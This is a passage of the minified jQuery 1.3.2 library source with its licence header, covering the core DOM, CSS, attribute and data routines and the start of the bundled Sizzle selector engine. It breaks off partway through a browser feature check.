/* Source File: jq_min_1.3.2.js */

/*
 * jQuery JavaScript Library v1.3.2
 * http://jquery.com/
 *
 * Copyright (c) 2009 John Resig
 * Dual licensed under the MIT and GPL licenses.
 * http://docs.jquery.com/License
 *
 * Date: 2009-02-19 17:34:21 -0500 (Thu, 19 Feb 2009)
 * Revision: 6246
 */
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document;F.selector=E;return F}}else{return o(H).find(E)}}else{if(o.isFunction(E)){return o(document).ready(E)}}if(E.selector&&E.context){this.selector=E.selector;this.context=E.context}return this.setArray(o.isArray(E)?E:o.makeArray(E))},selector:"",jquery:"1.3.2",size:function(){return this.length},get:function(E){return E===g?Array.prototype.slice.call(this):this[E]},pushStack:function(F,H,E){var G=o(F);G.prevObject=this;G.context=this.context;if(H==="find"){G.selector=this.selector+(this.selector?" ":"")+E}else{if(H){G.selector=this.selector+"."+H+"("+E+")"}}return G},setArray:function(E){this.length=0;Array.prototype.push.apply(this,E);return this},each:function(F,E){return o.each(this,F,E)},index:function(E){return o.inArray(E&&E.jquery?E[0]:E,this)},attr:function(F,H,G){var E=F;if(typeof F==="string"){if(H===g){return this[0]&&o[G||"attr"](this[0],F)}else{E={};E[F]=H}}return this.each(function(I){for(F in E){o.attr(G?this.style:this,F,o.prop(this,E[F],G,I,F))}})},css:function(E,F){if((E=="width"||E=="height")&&parseFloat(F)<0){F=g}return this.attr(E,F,"curCSS")},text:function(F){if(typeof F!=="object"&&F!=null){return this.empty().append((this[0]&&this[0].ownerDocument||document).createTextNode(F))}var E="";o.each(F||this,function(){o.each(this.childNodes,function(){if(this.nodeType!=8){E+=this.nodeType!=1?this.nodeValue:o.fn.text([this])}})});return E},wrapAll:function(E){if(this[0]){var F=o(E,this[0].ownerDocument).clone();if(this[0].parentNode){F.insertBefore(this[0])}F.map(function(){var G=this;while(G.firstChild){G=G.firstChild}return G}).append(this)}return this},wrapInner:function(E){return this.each(function(){o(this).contents().wrapAll(E)})},wrap:function(E){return this.each(function(){o(this).wrapAll(E)})},append:function(){return this.domManip(arguments,true,function(E){if(this.nodeType==1){this.appendChild(E)}})},prepend:function(){return this.domManip(arguments,true,function(E){if(this.nodeType==1){this.insertBefore(E,this.firstChild)}})},before:function(){return this.domManip(arguments,false,function(E){this.parentNode.insertBefore(E,this)})},after:function(){return this.domManip(arguments,false,function(E){this.parentNode.insertBefore(E,this.nextSibling)})},end:function(){return this.prevObject||o([])},push:[].push,sort:[].sort,splice:[].splice,find:function(E){if(this.length===1){var F=this.pushStack([],"find",E);F.length=0;o.find(E,this[0],F);return F}else{return this.pushStack(o.unique(o.map(this,function(G){return o.find(E,G)})),"find",E)}},clone:function(G){var E=this.map(function(){if(!o.support.noCloneEvent&&!o.isXMLDoc(this)){var I=this.outerHTML;if(!I){var J=this.ownerDocument.createElement("div");J.appendChild(this.cloneNode(true));I=J.innerHTML}return o.clean([I.replace(/ jQuery\d+="(?:\d+|null)"/g,"").replace(/^\s*/,"")])[0]}else{return this.cloneNode(true)}});if(G===true){var H=this.find("*").andSelf(),F=0;E.find("*").andSelf().each(function(){if(this.nodeName!==H[F].nodeName){return}var I=o.data(H[F],"events");for(var K in I){for(var J in I[K]){o.event.add(this,K,I[K][J],I[K][J].data)}}F++})}return E},filter:function(E){return this.pushStack(o.isFunction(E)&&o.grep(this,function(G,F){return E.call(G,F)})||o.multiFilter(E,o.grep(this,function(F){return F.nodeType===1})),"filter",E)},closest:function(E){var G=o.expr.match.POS.test(E)?o(E):null,F=0;return this.map(function(){var H=this;while(H&&H.ownerDocument){if(G?G.index(H)>-1:o(H).is(E)){o.data(H,"closest",F);return H}H=H.parentNode;F++}})},not:function(E){if(typeof E==="string"){if(f.test(E)){return this.pushStack(o.multiFilter(E,this,true),"not",E)}else{E=o.multiFilter(E,this)}}var F=E.length&&E[E.length-1]!==g&&!E.nodeType;return this.filter(function(){return F?o.inArray(this,E)<0:this!=E})},add:function(E){return this.pushStack(o.unique(o.merge(this.get(),typeof E==="string"?o(E):o.makeArray(E))))},is:function(E){return !!E&&o.multiFilter(E,this).length>0},hasClass:function(E){return !!E&&this.is("."+E)},val:function(K){if(K===g){var E=this[0];if(E){if(o.nodeName(E,"option")){return(E.attributes.value||{}).specified?E.value:E.text}if(o.nodeName(E,"select")){var I=E.selectedIndex,L=[],M=E.options,H=E.type=="select-one";if(I<0){return null}for(var F=H?I:0,J=H?I+1:M.length;F<J;F++){var G=M[F];if(G.selected){K=o(G).val();if(H){return K}L.push(K)}}return L}return(E.value||"").replace(/\r/g,"")}return g}if(typeof K==="number"){K+=""}return this.each(function(){if(this.nodeType!=1){return}if(o.isArray(K)&&/radio|checkbox/.test(this.type)){this.checked=(o.inArray(this.value,K)>=0||o.inArray(this.name,K)>=0)}else{if(o.nodeName(this,"select")){var N=o.makeArray(K);o("option",this).each(function(){this.selected=(o.inArray(this.value,N)>=0||o.inArray(this.text,N)>=0)});if(!N.length){this.selectedIndex=-1}}else{this.value=K}}})},html:function(E){return E===g?(this[0]?this[0].innerHTML.replace(/ jQuery\d+="(?:\d+|null)"/g,""):null):this.empty().append(E)},replaceWith:function(E){return this.after(E).remove()},eq:function(E){return this.slice(E,+E+1)},slice:function(){return this.pushStack(Array.prototype.slice.apply(this,arguments),"slice",Array.prototype.slice.call(arguments).join(","))},map:function(E){return this.pushStack(o.map(this,function(G,F){return E.call(G,F,G)}))},andSelf:function(){return this.add(this.prevObject)},domManip:function(J,M,L){if(this[0]){var I=(this[0].ownerDocument||this[0]).createDocumentFragment(),F=o.clean(J,(this[0].ownerDocument||this[0]),I),H=I.firstChild;if(H){for(var G=0,E=this.length;G<E;G++){L.call(K(this[G],H),this.length>1||G>0?I.cloneNode(true):I)}}if(F){o.each(F,z)}}return this;function K(N,O){return M&&o.nodeName(N,"table")&&o.nodeName(O,"tr")?(N.getElementsByTagName("tbody")[0]||N.appendChild(N.ownerDocument.createElement("tbody"))):N}}};o.fn.init.prototype=o.fn;function z(E,F){if(F.src){o.ajax({url:F.src,async:false,dataType:"script"})}else{o.globalEval(F.text||F.textContent||F.innerHTML||"")}if(F.parentNode){F.parentNode.removeChild(F)}}function e(){return +new Date}o.extend=o.fn.extend=function(){var J=arguments[0]||{},H=1,I=arguments.length,E=false,G;if(typeof J==="boolean"){E=J;J=arguments[1]||{};H=2}if(typeof J!=="object"&&!o.isFunction(J)){J={}}if(I==H){J=this;--H}for(;H<I;H++){if((G=arguments[H])!=null){for(var F in G){var K=J[F],L=G[F];if(J===L){continue}if(E&&L&&typeof L==="object"&&!L.nodeType){J[F]=o.extend(E,K||(L.length!=null?[]:{}),L)}else{if(L!==g){J[F]=L}}}}}return J};var b=/z-?index|font-?weight|opacity|zoom|line-?height/i,q=document.defaultView||{},s=Object.prototype.toString;o.extend({noConflict:function(E){l.$=p;if(E){l.jQuery=y}return o},isFunction:function(E){return s.call(E)==="[object Function]"},isArray:function(E){return s.call(E)==="[object Array]"},isXMLDoc:function(E){return E.nodeType===9&&E.documentElement.nodeName!=="HTML"||!!E.ownerDocument&&o.isXMLDoc(E.ownerDocument)},globalEval:function(G){if(G&&/\S/.test(G)){var F=document.getElementsByTagName("head")[0]||document.documentElement,E=document.createElement("script");E.type="text/javascript";if(o.support.scriptEval){E.appendChild(document.createTextNode(G))}else{E.text=G}F.insertBefore(E,F.firstChild);F.removeChild(E)}},nodeName:function(F,E){return F.nodeName&&F.nodeName.toUpperCase()==E.toUpperCase()},each:function(G,K,F){var E,H=0,I=G.length;if(F){if(I===g){for(E in G){if(K.apply(G[E],F)===false){break}}}else{for(;H<I;){if(K.apply(G[H++],F)===false){break}}}}else{if(I===g){for(E in G){if(K.call(G[E],E,G[E])===false){break}}}else{for(var J=G[0];H<I&&K.call(J,H,J)!==false;J=G[++H]){}}}return G},prop:function(H,I,G,F,E){if(o.isFunction(I)){I=I.call(H,F)}return typeof I==="number"&&G=="curCSS"&&!b.test(E)?I+"px":I},className:{add:function(E,F){o.each((F||"").split(/\s+/),function(G,H){if(E.nodeType==1&&!o.className.has(E.className,H)){E.className+=(E.className?" ":"")+H}})},remove:function(E,F){if(E.nodeType==1){E.className=F!==g?o.grep(E.className.split(/\s+/),function(G){return !o.className.has(F,G)}).join(" "):""}},has:function(F,E){return F&&o.inArray(E,(F.className||F).toString().split(/\s+/))>-1}},swap:function(H,G,I){var E={};for(var F in G){E[F]=H.style[F];H.style[F]=G[F]}I.call(H);for(var F in G){H.style[F]=E[F]}},css:function(H,F,J,E){if(F=="width"||F=="height"){var L,G={position:"absolute",visibility:"hidden",display:"block"},K=F=="width"?["Left","Right"]:["Top","Bottom"];function I(){L=F=="width"?H.offsetWidth:H.offsetHeight;if(E==="border"){return}o.each(K,function(){if(!E){L-=parseFloat(o.curCSS(H,"padding"+this,true))||0}if(E==="margin"){L+=parseFloat(o.curCSS(H,"margin"+this,true))||0}else{L-=parseFloat(o.curCSS(H,"border"+this+"Width",true))||0}})}if(H.offsetWidth!==0){I()}else{o.swap(H,G,I)}return Math.max(0,Math.round(L))}return o.curCSS(H,F,J)},curCSS:function(I,F,G){var L,E=I.style;if(F=="opacity"&&!o.support.opacity){L=o.attr(E,"opacity");return L==""?"1":L}if(F.match(/float/i)){F=w}if(!G&&E&&E[F]){L=E[F]}else{if(q.getComputedStyle){if(F.match(/float/i)){F="float"}F=F.replace(/([A-Z])/g,"-$1").toLowerCase();var M=q.getComputedStyle(I,null);if(M){L=M.getPropertyValue(F)}if(F=="opacity"&&L==""){L="1"}}else{if(I.currentStyle){var J=F.replace(/\-(\w)/g,function(N,O){return O.toUpperCase()});L=I.currentStyle[F]||I.currentStyle[J];if(!/^\d+(px)?$/i.test(L)&&/^\d/.test(L)){var H=E.left,K=I.runtimeStyle.left;I.runtimeStyle.left=I.currentStyle.left;E.left=L||0;L=E.pixelLeft+"px";E.left=H;I.runtimeStyle.left=K}}}}return L},clean:function(F,K,I){K=K||document;if(typeof K.createElement==="undefined"){K=K.ownerDocument||K[0]&&K[0].ownerDocument||document}if(!I&&F.length===1&&typeof F[0]==="string"){var H=/^<(\w+)\s*\/?>$/.exec(F[0]);if(H){return[K.createElement(H[1])]}}var G=[],E=[],L=K.createElement("div");o.each(F,function(P,S){if(typeof S==="number"){S+=""}if(!S){return}if(typeof S==="string"){S=S.replace(/(<(\w+)[^>]*?)\/>/g,function(U,V,T){return T.match(/^(abbr|br|col|img|input|link|meta|param|hr|area|embed)$/i)?U:V+"></"+T+">"});var O=S.replace(/^\s+/,"").substring(0,10).toLowerCase();var Q=!O.indexOf("<opt")&&[1,"<select multiple='multiple'>","</select>"]||!O.indexOf("<leg")&&[1,"<fieldset>","</fieldset>"]||O.match(/^<(thead|tbody|tfoot|colg|cap)/)&&[1,"<table>","</table>"]||!O.indexOf("<tr")&&[2,"<table><tbody>","</tbody></table>"]||(!O.indexOf("<td")||!O.indexOf("<th"))&&[3,"<table><tbody><tr>","</tr></tbody></table>"]||!O.indexOf("<col")&&[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"]||!o.support.htmlSerialize&&[1,"div<div>","</div>"]||[0,"",""];L.innerHTML=Q[1]+S+Q[2];while(Q[0]--){L=L.lastChild}if(!o.support.tbody){var R=/<tbody/i.test(S),N=!O.indexOf("<table")&&!R?L.firstChild&&L.firstChild.childNodes:Q[1]=="<table>"&&!R?L.childNodes:[];for(var M=N.length-1;M>=0;--M){if(o.nodeName(N[M],"tbody")&&!N[M].childNodes.length){N[M].parentNode.removeChild(N[M])}}}if(!o.support.leadingWhitespace&&/^\s/.test(S)){L.insertBefore(K.createTextNode(S.match(/^\s*/)[0]),L.firstChild)}S=o.makeArray(L.childNodes)}if(S.nodeType){G.push(S)}else{G=o.merge(G,S)}});if(I){for(var J=0;G[J];J++){if(o.nodeName(G[J],"script")&&(!G[J].type||G[J].type.toLowerCase()==="text/javascript")){E.push(G[J].parentNode?G[J].parentNode.removeChild(G[J]):G[J])}else{if(G[J].nodeType===1){G.splice.apply(G,[J+1,0].concat(o.makeArray(G[J].getElementsByTagName("script"))))}I.appendChild(G[J])}}return E}return G},attr:function(J,G,K){if(!J||J.nodeType==3||J.nodeType==8){return g}var H=!o.isXMLDoc(J),L=K!==g;G=H&&o.props[G]||G;if(J.tagName){var F=/href|src|style/.test(G);if(G=="selected"&&J.parentNode){J.parentNode.selectedIndex}if(G in J&&H&&!F){if(L){if(G=="type"&&o.nodeName(J,"input")&&J.parentNode){throw"type property can't be changed"}J[G]=K}if(o.nodeName(J,"form")&&J.getAttributeNode(G)){return J.getAttributeNode(G).nodeValue}if(G=="tabIndex"){var I=J.getAttributeNode("tabIndex");return I&&I.specified?I.value:J.nodeName.match(/(button|input|object|select|textarea)/i)?0:J.nodeName.match(/^(a|area)$/i)&&J.href?0:g}return J[G]}if(!o.support.style&&H&&G=="style"){return o.attr(J.style,"cssText",K)}if(L){J.setAttribute(G,""+K)}var E=!o.support.hrefNormalized&&H&&F?J.getAttribute(G,2):J.getAttribute(G);return E===null?g:E}if(!o.support.opacity&&G=="opacity"){if(L){J.zoom=1;J.filter=(J.filter||"").replace(/alpha\([^)]*\)/,"")+(parseInt(K)+""=="NaN"?"":"alpha(opacity="+K*100+")")}return J.filter&&J.filter.indexOf("opacity=")>=0?(parseFloat(J.filter.match(/opacity=([^)]*)/)[1])/100)+"":""}G=G.replace(/-([a-z])/ig,function(M,N){return N.toUpperCase()});if(L){J[G]=K}return J[G]},trim:function(E){return(E||"").replace(/^\s+|\s+$/g,"")},makeArray:function(G){var E=[];if(G!=null){var F=G.length;if(F==null||typeof G==="string"||o.isFunction(G)||G.setInterval){E[0]=G}else{while(F){E[--F]=G[F]}}}return E},inArray:function(G,H){for(var E=0,F=H.length;E<F;E++){if(H[E]===G){return E}}return -1},merge:function(H,E){var F=0,G,I=H.length;if(!o.support.getAll){while((G=E[F++])!=null){if(G.nodeType!=8){H[I++]=G}}}else{while((G=E[F++])!=null){H[I++]=G}}return H},unique:function(K){var F=[],E={};try{for(var G=0,H=K.length;G<H;G++){var J=o.data(K[G]);if(!E[J]){E[J]=true;F.push(K[G])}}}catch(I){F=K}return F},grep:function(F,J,E){var G=[];for(var H=0,I=F.length;H<I;H++){if(!E!=!J(F[H],H)){G.push(F[H])}}return G},map:function(E,J){var F=[];for(var G=0,H=E.length;G<H;G++){var I=J(E[G],G);if(I!=null){F[F.length]=I}}return F.concat.apply([],F)}});var C=navigator.userAgent.toLowerCase();o.browser={version:(C.match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/)||[0,"0"])[1],safari:/webkit/.test(C),opera:/opera/.test(C),msie:/msie/.test(C)&&!/opera/.test(C),mozilla:/mozilla/.test(C)&&!/(compatible|webkit)/.test(C)};o.each({parent:function(E){return E.parentNode},parents:function(E){return o.dir(E,"parentNode")},next:function(E){return o.nth(E,2,"nextSibling")},prev:function(E){return o.nth(E,2,"previousSibling")},nextAll:function(E){return o.dir(E,"nextSibling")},prevAll:function(E){return o.dir(E,"previousSibling")},siblings:function(E){return o.sibling(E.parentNode.firstChild,E)},children:function(E){return o.sibling(E.firstChild)},contents:function(E){return o.nodeName(E,"iframe")?E.contentDocument||E.contentWindow.document:o.makeArray(E.childNodes)}},function(E,F){o.fn[E]=function(G){var H=o.map(this,F);if(G&&typeof G=="string"){H=o.multiFilter(G,H)}return this.pushStack(o.unique(H),E,G)}});o.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(E,F){o.fn[E]=function(G){var J=[],L=o(G);for(var K=0,H=L.length;K<H;K++){var I=(K>0?this.clone(true):this).get();o.fn[F].apply(o(L[K]),I);J=J.concat(I)}return this.pushStack(J,E,G)}});o.each({removeAttr:function(E){o.attr(this,E,"");if(this.nodeType==1){this.removeAttribute(E)}},addClass:function(E){o.className.add(this,E)},removeClass:function(E){o.className.remove(this,E)},toggleClass:function(F,E){if(typeof E!=="boolean"){E=!o.className.has(this,F)}o.className[E?"add":"remove"](this,F)},remove:function(E){if(!E||o.filter(E,[this]).length){o("*",this).add([this]).each(function(){o.event.remove(this);o.removeData(this)});if(this.parentNode){this.parentNode.removeChild(this)}}},empty:function(){o(this).children().remove();while(this.firstChild){this.removeChild(this.firstChild)}}},function(E,F){o.fn[E]=function(){return this.each(F,arguments)}});function j(E,F){return E[0]&&parseInt(o.curCSS(E[0],F,true),10)||0}var h="jQuery"+e(),v=0,A={};o.extend({cache:{},data:function(F,E,G){F=F==l?A:F;var H=F[h];if(!H){H=F[h]=++v}if(E&&!o.cache[H]){o.cache[H]={}}if(G!==g){o.cache[H][E]=G}return E?o.cache[H][E]:H},removeData:function(F,E){F=F==l?A:F;var H=F[h];if(E){if(o.cache[H]){delete o.cache[H][E];E="";for(E in o.cache[H]){break}if(!E){o.removeData(F)}}}else{try{delete F[h]}catch(G){if(F.removeAttribute){F.removeAttribute(h)}}delete o.cache[H]}},queue:function(F,E,H){if(F){E=(E||"fx")+"queue";var G=o.data(F,E);if(!G||o.isArray(H)){G=o.data(F,E,o.makeArray(H))}else{if(H){G.push(H)}}}return G},dequeue:function(H,G){var E=o.queue(H,G),F=E.shift();if(!G||G==="fx"){F=E[0]}if(F!==g){F.call(H)}}});o.fn.extend({data:function(E,G){var H=E.split(".");H[1]=H[1]?"."+H[1]:"";if(G===g){var F=this.triggerHandler("getData"+H[1]+"!",[H[0]]);if(F===g&&this.length){F=o.data(this[0],E)}return F===g&&H[1]?this.data(H[0]):F}else{return this.trigger("setData"+H[1]+"!",[H[0],G]).each(function(){o.data(this,E,G)})}},removeData:function(E){return this.each(function(){o.removeData(this,E)})},queue:function(E,F){if(typeof E!=="string"){F=E;E="fx"}if(F===g){return o.queue(this[0],E)}return this.each(function(){var G=o.queue(this,E,F);if(E=="fx"&&G.length==1){G[0].call(this)}})},dequeue:function(E){return this.each(function(){o.dequeue(this,E)})}});
/*
 * Sizzle CSS Selector Engine - v0.9.3
 *  Copyright 2009, The Dojo Foundation
 *  Released under the MIT, BSD, and GPL Licenses.
 *  More information: http://sizzlejs.com/
 */
(function(){var R=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?/g,L=0,H=Object.prototype.toString;var F=function(Y,U,ab,ac){ab=ab||[];U=U||document;if(U.nodeType!==1&&U.nodeType!==9){return[]}if(!Y||typeof Y!=="string"){return ab}var Z=[],W,af,ai,T,ad,V,X=true;R.lastIndex=0;while((W=R.exec(Y))!==null){Z.push(W[1]);if(W[2]){V=RegExp.rightContext;break}}if(Z.length>1&&M.exec(Y)){if(Z.length===2&&I.relative[Z[0]]){af=J(Z[0]+Z[1],U)}else{af=I.relative[Z[0]]?[U]:F(Z.shift(),U);while(Z.length){Y=Z.shift();if(I.relative[Y]){Y+=Z.shift()}af=J(Y,af)}}}else{var ae=ac?{expr:Z.pop(),set:E(ac)}:F.find(Z.pop(),Z.length===1&&U.parentNode?U.parentNode:U,Q(U));af=F.filter(ae.expr,ae.set);if(Z.length>0){ai=E(af)}else{X=false}while(Z.length){var ah=Z.pop(),ag=ah;if(!I.relative[ah]){ah=""}else{ag=Z.pop()}if(ag==null){ag=U}I.relative[ah](ai,ag,Q(U))}}if(!ai){ai=af}if(!ai){throw"Syntax error, unrecognized expression: "+(ah||Y)}if(H.call(ai)==="[object Array]"){if(!X){ab.push.apply(ab,ai)}else{if(U.nodeType===1){for(var aa=0;ai[aa]!=null;aa++){if(ai[aa]&&(ai[aa]===true||ai[aa].nodeType===1&&K(U,ai[aa]))){ab.push(af[aa])}}}else{for(var aa=0;ai[aa]!=null;aa++){if(ai[aa]&&ai[aa].nodeType===1){ab.push(af[aa])}}}}}else{E(ai,ab)}if(V){F(V,U,ab,ac);if(G){hasDuplicate=false;ab.sort(G);if(hasDuplicate){for(var aa=1;aa<ab.length;aa++){if(ab[aa]===ab[aa-1]){ab.splice(aa--,1)}}}}}return ab};F.matches=function(T,U){return F(T,null,null,U)};F.find=function(aa,T,ab){var Z,X;if(!aa){return[]}for(var W=0,V=I.order.length;W<V;W++){var Y=I.order[W],X;if((X=I.match[Y].exec(aa))){var U=RegExp.leftContext;if(U.substr(U.length-1)!=="\\"){X[1]=(X[1]||"").replace(/\\/g,"");Z=I.find[Y](X,T,ab);if(Z!=null){aa=aa.replace(I.match[Y],"");break}}}}if(!Z){Z=T.getElementsByTagName("*")}return{set:Z,expr:aa}};F.filter=function(ad,ac,ag,W){var V=ad,ai=[],aa=ac,Y,T,Z=ac&&ac[0]&&Q(ac[0]);while(ad&&ac.length){for(var ab in I.filter){if((Y=I.match[ab].exec(ad))!=null){var U=I.filter[ab],ah,af;T=false;if(aa==ai){ai=[]}if(I.preFilter[ab]){Y=I.preFilter[ab](Y,aa,ag,ai,W,Z);if(!Y){T=ah=true}else{if(Y===true){continue}}}if(Y){for(var X=0;(af=aa[X])!=null;X++){if(af){ah=U(af,Y,X,aa);var ae=W^!!ah;if(ag&&ah!=null){if(ae){T=true}else{aa[X]=false}}else{if(ae){ai.push(af);T=true}}}}}if(ah!==g){if(!ag){aa=ai}ad=ad.replace(I.match[ab],"");if(!T){return[]}break}}}if(ad==V){if(T==null){throw"Syntax error, unrecognized expression: "+ad}else{break}}V=ad}return aa};var I=F.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF_-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF_-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF_-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF_-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*_-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF_-]|\\.)+)(?:\((['"]*)((?:\([^\)]+\)|[^\2\(\)]*)+)\2\))?/},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(T){return T.getAttribute("href")}},relative:{"+":function(aa,T,Z){var X=typeof T==="string",ab=X&&!/\W/.test(T),Y=X&&!ab;if(ab&&!Z){T=T.toUpperCase()}for(var W=0,V=aa.length,U;W<V;W++){if((U=aa[W])){while((U=U.previousSibling)&&U.nodeType!==1){}aa[W]=Y||U&&U.nodeName===T?U||false:U===T}}if(Y){F.filter(T,aa,true)}},">":function(Z,U,aa){var X=typeof U==="string";if(X&&!/\W/.test(U)){U=aa?U:U.toUpperCase();for(var V=0,T=Z.length;V<T;V++){var Y=Z[V];if(Y){var W=Y.parentNode;Z[V]=W.nodeName===U?W:false}}}else{for(var V=0,T=Z.length;V<T;V++){var Y=Z[V];if(Y){Z[V]=X?Y.parentNode:Y.parentNode===U}}if(X){F.filter(U,Z,true)}}},"":function(W,U,Y){var V=L++,T=S;if(!U.match(/\W/)){var X=U=Y?U:U.toUpperCase();T=P}T("parentNode",U,V,W,X,Y)},"~":function(W,U,Y){var V=L++,T=S;if(typeof U==="string"&&!U.match(/\W/)){var X=U=Y?U:U.toUpperCase();T=P}T("previousSibling",U,V,W,X,Y)}},find:{ID:function(U,V,W){if(typeof V.getElementById!=="undefined"&&!W){var T=V.getElementById(U[1]);return T?[T]:[]}},NAME:function(V,Y,Z){if(typeof Y.getElementsByName!=="undefined"){var U=[],X=Y.getElementsByName(V[1]);for(var W=0,T=X.length;W<T;W++){if(X[W].getAttribute("name")===V[1]){U.push(X[W])}}return U.length===0?null:U}},TAG:function(T,U){return U.getElementsByTagName(T[1])}},preFilter:{CLASS:function(W,U,V,T,Z,aa){W=" "+W[1].replace(/\\/g,"")+" ";if(aa){return W}for(var X=0,Y;(Y=U[X])!=null;X++){if(Y){if(Z^(Y.className&&(" "+Y.className+" ").indexOf(W)>=0)){if(!V){T.push(Y)}}else{if(V){U[X]=false}}}}return false},ID:function(T){return T[1].replace(/\\/g,"")},TAG:function(U,T){for(var V=0;T[V]===false;V++){}return T[V]&&Q(T[V])?U[1]:U[1].toUpperCase()},CHILD:function(T){if(T[1]=="nth"){var U=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(T[2]=="even"&&"2n"||T[2]=="odd"&&"2n+1"||!/\D/.test(T[2])&&"0n+"+T[2]||T[2]);T[2]=(U[1]+(U[2]||1))-0;T[3]=U[3]-0}T[0]=L++;return T},ATTR:function(X,U,V,T,Y,Z){var W=X[1].replace(/\\/g,"");if(!Z&&I.attrMap[W]){X[1]=I.attrMap[W]}if(X[2]==="~="){X[4]=" "+X[4]+" "}return X},PSEUDO:function(X,U,V,T,Y){if(X[1]==="not"){if(X[3].match(R).length>1||/^\w/.test(X[3])){X[3]=F(X[3],null,null,U)}else{var W=F.filter(X[3],U,V,true^Y);if(!V){T.push.apply(T,W)}return false}}else{if(I.match.POS.test(X[0])||I.match.CHILD.test(X[0])){return true}}return X},POS:function(T){T.unshift(true);return T}},filters:{enabled:function(T){return T.disabled===false&&T.type!=="hidden"},disabled:function(T){return T.disabled===true},checked:function(T){return T.checked===true},selected:function(T){T.parentNode.selectedIndex;return T.selected===true},parent:function(T){return !!T.firstChild},empty:function(T){return !T.firstChild},has:function(V,U,T){return !!F(T[3],V).length},header:function(T){return/h\d/i.test(T.nodeName)},text:function(T){return"text"===T.type},radio:function(T){return"radio"===T.type},checkbox:function(T){return"checkbox"===T.type},file:function(T){return"file"===T.type},password:function(T){return"password"===T.type},submit:function(T){return"submit"===T.type},image:function(T){return"image"===T.type},reset:function(T){return"reset"===T.type},button:function(T){return"button"===T.type||T.nodeName.toUpperCase()==="BUTTON"},input:function(T){return/input|select|textarea|button/i.test(T.nodeName)}},setFilters:{first:function(U,T){return T===0},last:function(V,U,T,W){return U===W.length-1},even:function(U,T){return T%2===0},odd:function(U,T){return T%2===1},lt:function(V,U,T){return U<T[3]-0},gt:function(V,U,T){return U>T[3]-0},nth:function(V,U,T){return T[3]-0==U},eq:function(V,U,T){return T[3]-0==U}},filter:{PSEUDO:function(Z,V,W,aa){var U=V[1],X=I.filters[U];if(X){return X(Z,W,V,aa)}else{if(U==="contains"){return(Z.textContent||Z.innerText||"").indexOf(V[3])>=0}else{if(U==="not"){var Y=V[3];for(var W=0,T=Y.length;W<T;W++){if(Y[W]===Z){return false}}return true}}}},CHILD:function(T,W){var Z=W[1],U=T;switch(Z){case"only":case"first":while(U=U.previousSibling){if(U.nodeType===1){return false}}if(Z=="first"){return true}U=T;case"last":while(U=U.nextSibling){if(U.nodeType===1){return false}}return true;case"nth":var V=W[2],ac=W[3];if(V==1&&ac==0){return true}var Y=W[0],ab=T.parentNode;if(ab&&(ab.sizcache!==Y||!T.nodeIndex)){var X=0;for(U=ab.firstChild;U;U=U.nextSibling){if(U.nodeType===1){U.nodeIndex=++X}}ab.sizcache=Y}var aa=T.nodeIndex-ac;if(V==0){return aa==0}else{return(aa%V==0&&aa/V>=0)}}},ID:function(U,T){return U.nodeType===1&&U.getAttribute("id")===T},TAG:function(U,T){return(T==="*"&&U.nodeType===1)||U.nodeName===T},CLASS:function(U,T){return(" "+(U.className||U.getAttribute("class"))+" ").indexOf(T)>-1},ATTR:function(Y,W){var V=W[1],T=I.attrHandle[V]?I.attrHandle[V](Y):Y[V]!=null?Y[V]:Y.getAttribute(V),Z=T+"",X=W[2],U=W[4];return T==null?X==="!=":X==="="?Z===U:X==="*="?Z.indexOf(U)>=0:X==="~="?(" "+Z+" ").indexOf(U)>=0:!U?Z&&T!==false:X==="!="?Z!=U:X==="^="?Z.indexOf(U)===0:X==="$="?Z.substr(Z.length-U.length)===U:X==="|="?Z===U||Z.substr(0,U.length+1)===U+"-":false},POS:function(X,U,V,Y){var T=U[2],W=I.setFilters[T];if(W){return W(X,V,U,Y)}}}};var M=I.match.POS;for(var O in I.match){I.match[O]=RegExp(I.match[O].source+/(?![^\[]*\])(?![^\(]*\))/.source)}var E=function(U,T){U=Array.prototype.slice.call(U);if(T){T.push.apply(T,U);return T}return U};try{Array.prototype.slice.call(document.documentElement.childNodes)}catch(N){E=function(X,W){var U=W||[];if(H.call(X)==="[object Array]"){Array.prototype.push.apply(U,X)}else{if(typeof X.length==="number"){for(var V=0,T=X.length;V<T;V++){U.push(X[V])}}else{for(var V=0;X[V];V++){U.push(X[V])}}}return U}}var G;if(document.documentElement.compareDocumentPosition){G=function(U,T){var V=U.compareDocumentPosition(T)&4?-1:U===T?0:1;if(V===0){hasDuplicate=true}return V}}else{if("sourceIndex" in document.documentElement){G=function(U,T){var V=U.sourceIndex-T.sourceIndex;if(V===0){hasDuplicate=true}return V}}else{if(document.createRange){G=function(W,U){var V=W.ownerDocument.createRange(),T=U.ownerDocument.createRange();V.selectNode(W);V.collapse(true);T.selectNode(U);T.collapse(true);var X=V.compareBoundaryPoints(Range.START_TO_END,T);if(X===0){hasDuplicate=true}return X}}}}(function(){var U=document.createElement("form"),V="script"+(new Date).getTime();U.innerHTML="<input name='"+V+"'/>";var 